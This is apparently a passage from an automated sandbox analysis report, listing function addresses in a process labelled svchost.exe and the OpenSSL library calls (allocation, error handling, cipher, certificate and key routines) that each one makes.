    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE4DEA0 EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,CRYPTO_zalloc,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_free,EVP_CIPHER_CTX_new,EVP_CIPHER_fetch,OSSL_PARAM_construct_utf8_string,OSSL_PARAM_construct_end,EVP_DecryptInit_ex,EVP_CIPHER_free,EVP_CIPHER_free,EVP_CIPHER_free,EVP_MAC_CTX_get_mac_size,EVP_CIPHER_CTX_get_iv_length,EVP_MAC_final,CRYPTO_memcmp,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,memcpy,ERR_clear_error,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_CTX_free,CRYPTO_free,46_2_00007FFA2CE4DEA0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE87E90 CRYPTO_malloc,COMP_expand_block,46_2_00007FFA2CE87E90
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE95E80 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,OPENSSL_cleanse,memcpy,EVP_MD_get0_name,EVP_MD_is_a,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,46_2_00007FFA2CE95E80
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE61E70 CRYPTO_realloc,46_2_00007FFA2CE61E70
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE59E60 OPENSSL_LH_free,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free,46_2_00007FFA2CE59E60
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE43E50 CRYPTO_free,CRYPTO_memdup,46_2_00007FFA2CE43E50
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE75E20 CRYPTO_zalloc,OSSL_ERR_STATE_new,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,46_2_00007FFA2CE75E20
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE73E10 CRYPTO_malloc,CRYPTO_free,46_2_00007FFA2CE73E10
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2DE10 i2d_X509_NAME,memcmp,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE2DE10
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE49E00 CRYPTO_zalloc,EVP_MAC_fetch,EVP_MAC_CTX_new,EVP_MAC_free,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free,46_2_00007FFA2CE49E00
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8DDE0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,46_2_00007FFA2CE8DDE0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE55FA0 CRYPTO_realloc,46_2_00007FFA2CE55FA0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEABFA0 EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,ERR_new,ERR_set_debug,EVP_PKEY_derive_set_peer,ERR_clear_error,ASN1_item_d2i,ASN1_TYPE_get,ERR_new,ERR_set_debug,EVP_PKEY_decrypt,ERR_new,EVP_PKEY_CTX_ctrl,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,ASN1_item_free,46_2_00007FFA2CEABFA0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE29F90 CRYPTO_malloc,memset,memcpy,memcpy,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,OPENSSL_cleanse,46_2_00007FFA2CE29F90
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2DF70 CRYPTO_malloc,BIO_snprintf,46_2_00007FFA2CE2DF70
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE49F30 OSSL_PROVIDER_do_all,CRYPTO_malloc,memcpy,46_2_00007FFA2CE49F30
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE91F30 CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE91F30
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE43F00 CRYPTO_free,CRYPTO_strdup,46_2_00007FFA2CE43F00
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE77EC0 CRYPTO_zalloc,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,46_2_00007FFA2CE77EC0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE21EC0 CRYPTO_free,46_2_00007FFA2CE21EC0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE90070 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,46_2_00007FFA2CE90070
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE44060 CRYPTO_free,CRYPTO_memdup,46_2_00007FFA2CE44060
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE4A030 OSSL_PROVIDER_do_all,CRYPTO_free,CRYPTO_zalloc,OBJ_txt2nid,46_2_00007FFA2CE4A030
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE60010 CRYPTO_zalloc,CRYPTO_strdup,CRYPTO_free,46_2_00007FFA2CE60010
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE62000 CRYPTO_free,46_2_00007FFA2CE62000
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2BFF0 CRYPTO_THREAD_run_once,46_2_00007FFA2CE2BFF0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE87FE0 ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_CIPHER_get_flags,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_MD_get_size,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_mark,ERR_clear_last_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ERR_clear_last_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_CIPHER_CTX_get0_cipher,CRYPTO_memcmp,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,46_2_00007FFA2CE87FE0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6FFD0 CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE6FFD0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE999B3 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,46_2_00007FFA2CE999B3
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE619A0 CRYPTO_malloc,46_2_00007FFA2CE619A0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE9999C EVP_MD_CTX_new,ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OSSL_STORE_INFO_get_type,OSSL_STORE_INFO_get_type,OSSL_STORE_INFO_get_type,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,ERR_set_debug,OSSL_STORE_INFO_get_type,CRYPTO_malloc,BUF_reverse,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_MD_CTX_ctrl,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,BIO_free,EVP_MD_CTX_free,CRYPTO_free,46_2_00007FFA2CE9999C
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE99985 ERR_new,ERR_set_debug,EVP_PKEY_free,ERR_new,ERR_set_debug,OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,X509_free,OSSL_STACK_OF_X509_free,46_2_00007FFA2CE99985
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE31950 CRYPTO_free,CRYPTO_strdup,46_2_00007FFA2CE31950
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE87920 ERR_new,ERR_set_debug,CRYPTO_malloc,COMP_expand_block,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CE87920
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE718E9 CRYPTO_malloc,CRYPTO_free,46_2_00007FFA2CE718E9
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE818D0 CRYPTO_free,46_2_00007FFA2CE818D0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE578D0 BIO_free_all,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE578D0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE5B8D0 CRYPTO_free,CRYPTO_free,OSSL_ERR_STATE_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE5B8D0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE938C0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,46_2_00007FFA2CE938C0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8B8C0 CRYPTO_free,46_2_00007FFA2CE8B8C0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE3DAA0 CRYPTO_zalloc,CRYPTO_THREAD_lock_new,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_new,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_inherit,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_malloc,memcpy,CRYPTO_memdup,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,46_2_00007FFA2CE3DAA0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE9BAA0 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_clear_free,CRYPTO_clear_free,46_2_00007FFA2CE9BAA0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE33A70 CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OSSL_STACK_OF_X509_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,EVP_MD_get0_provider,EVP_MD_free,EVP_MD_get0_provider,EVP_MD_free,EVP_CIPHER_get0_provider,EVP_CIPHER_free,EVP_MD_get0_provider,EVP_MD_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE33A70
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE43A70 CRYPTO_get_ex_data,46_2_00007FFA2CE43A70
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE61A60 CRYPTO_free,46_2_00007FFA2CE61A60
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2DA50 OPENSSL_sk_num,X509_STORE_CTX_new_ex,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,X509_STORE_CTX_init,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,X509_STORE_CTX_set_flags,CRYPTO_THREAD_run_once,X509_STORE_CTX_set_ex_data,OPENSSL_sk_num,X509_STORE_CTX_set0_dane,X509_STORE_CTX_set_default,X509_VERIFY_PARAM_set1,X509_STORE_CTX_set_verify_cb,X509_verify_cert,X509_STORE_CTX_get_error,OSSL_STACK_OF_X509_free,X509_STORE_CTX_get0_chain,X509_STORE_CTX_get1_chain,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_move_peername,X509_STORE_CTX_free,46_2_00007FFA2CE2DA50
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7DA40 CRYPTO_memcmp,46_2_00007FFA2CE7DA40
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE29A20 EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_is_a,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_derive,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,46_2_00007FFA2CE29A20
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE579D0 CRYPTO_malloc,memcpy,BIO_snprintf,BIO_snprintf,CRYPTO_zalloc,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_new_file,BIO_free_all,CRYPTO_free,BIO_free_all,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE579D0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE47B50 EVP_CIPHER_get_mode,EVP_CIPHER_get_mode,EVP_CIPHER_get_iv_length,ERR_new,ERR_set_debug,EVP_CIPHER_get_key_length,CRYPTO_malloc,ERR_new,ERR_set_debug,46_2_00007FFA2CE47B50
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE99B4A memset,CRYPTO_zalloc,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,46_2_00007FFA2CE99B4A
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE99B33 EVP_PKEY_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestVerify,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,46_2_00007FFA2CE99B33
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6BB00 CRYPTO_free,46_2_00007FFA2CE6BB00
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE5FCB0 CRYPTO_free,46_2_00007FFA2CE5FCB0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE99CAA ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,EVP_MD_fetch,ERR_new,ERR_new,ERR_set_debug,EVP_MD_free,EVP_MD_get_size,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_free,CRYPTO_free,46_2_00007FFA2CE99CAA
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8FC90 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,memcmp,ERR_new,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,46_2_00007FFA2CE8FC90
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE91C70 CRYPTO_realloc,46_2_00007FFA2CE91C70
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE29C50 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,CRYPTO_malloc,EVP_PKEY_encapsulate,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_free,EVP_PKEY_CTX_free,46_2_00007FFA2CE29C50
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE21C50 CRYPTO_zalloc,46_2_00007FFA2CE21C50
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE23C40 ERR_clear_error,ERR_new,ERR_set_debug,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,SetLastError,BIO_read,BIO_ADDR_new,BIO_ctrl,BIO_ctrl,BIO_ADDR_free,BIO_write,BIO_ctrl,BIO_test_flags,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,BIO_ctrl,BIO_ADDR_clear,BIO_write,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,BIO_test_flags,BIO_ADDR_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,46_2_00007FFA2CE23C40
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA9C40 EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get_security_bits,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_bn_param,EVP_PKEY_get_bn_param,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_num_bits,BN_num_bits,memset,BN_num_bits,BN_bn2bin,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,ERR_set_debug,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,ERR_set_debug,EVP_DigestSign,EVP_DigestSign,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,BN_free,BN_free,BN_free,BN_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CEA9C40
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE73C30 CRYPTO_zalloc,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE73C30
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE3BC10 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,46_2_00007FFA2CE3BC10
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE27BEE CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CE27BEE
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE21BE0 CRYPTO_zalloc,46_2_00007FFA2CE21BE0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE475B0 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,memcpy,memcpy,memcmp,memcmp,memcmp,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_clear_free,46_2_00007FFA2CE475B0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE895A0 CRYPTO_free,46_2_00007FFA2CE895A0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE29590 CRYPTO_free,CRYPTO_memdup,46_2_00007FFA2CE29590
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8B590 CRYPTO_free,46_2_00007FFA2CE8B590
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE45550 CRYPTO_malloc,CRYPTO_new_ex_data,ERR_new,ERR_set_debug,ERR_set_error,X509_up_ref,ERR_new,ERR_set_debug,ERR_set_error,X509_chain_up_ref,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_up_ref,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_dup_ex_data,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_strdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_memdup,46_2_00007FFA2CE45550
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEAB550 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CEAB550
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE89540 OPENSSL_cleanse,CRYPTO_free,46_2_00007FFA2CE89540
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2B500 CRYPTO_free,46_2_00007FFA2CE2B500
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE35500 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,46_2_00007FFA2CE35500
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE434E0 CRYPTO_THREAD_write_lock,OPENSSL_LH_delete,OPENSSL_sk_push,OPENSSL_LH_set_down_load,CRYPTO_THREAD_unlock,OPENSSL_sk_pop_free,46_2_00007FFA2CE434E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8D4E0 ERR_new,ERR_set_debug,CRYPTO_free,46_2_00007FFA2CE8D4E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE974E0 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CE974E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE916B0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,46_2_00007FFA2CE916B0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE3D68B X509_VERIFY_PARAM_free,BIO_pop,BIO_free,BUF_MEM_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,SCT_LIST_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,OSSL_STACK_OF_X509_free,ASYNC_WAIT_CTX_free,CRYPTO_free,OPENSSL_sk_free,BIO_free_all,BIO_free_all,CRYPTO_free,46_2_00007FFA2CE3D68B
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE43650 CRYPTO_THREAD_unlock,46_2_00007FFA2CE43650
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA1650 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CEA1650
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE89620 CRYPTO_malloc,ERR_new,ERR_set_debug,46_2_00007FFA2CE89620
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE5B5F0 CRYPTO_free,46_2_00007FFA2CE5B5F0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8D5F0 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_cleanse,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,CRYPTO_memcmp,ERR_new,ERR_new,46_2_00007FFA2CE8D5F0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8B5E0 CRYPTO_free,46_2_00007FFA2CE8B5E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE775D0 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE775D0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE215D0 CRYPTO_free,46_2_00007FFA2CE215D0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE235C8 CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags,46_2_00007FFA2CE235C8
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE35780 a2i_IPADDRESS,ASN1_OCTET_STRING_free,X509_VERIFY_PARAM_get1_ip_asc,CRYPTO_free,X509_VERIFY_PARAM_add1_host,46_2_00007FFA2CE35780
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE95760 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CE95760
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE21740 CRYPTO_zalloc,CRYPTO_free,46_2_00007FFA2CE21740
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE89730 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,CRYPTO_free,46_2_00007FFA2CE89730
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE33700 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE33700
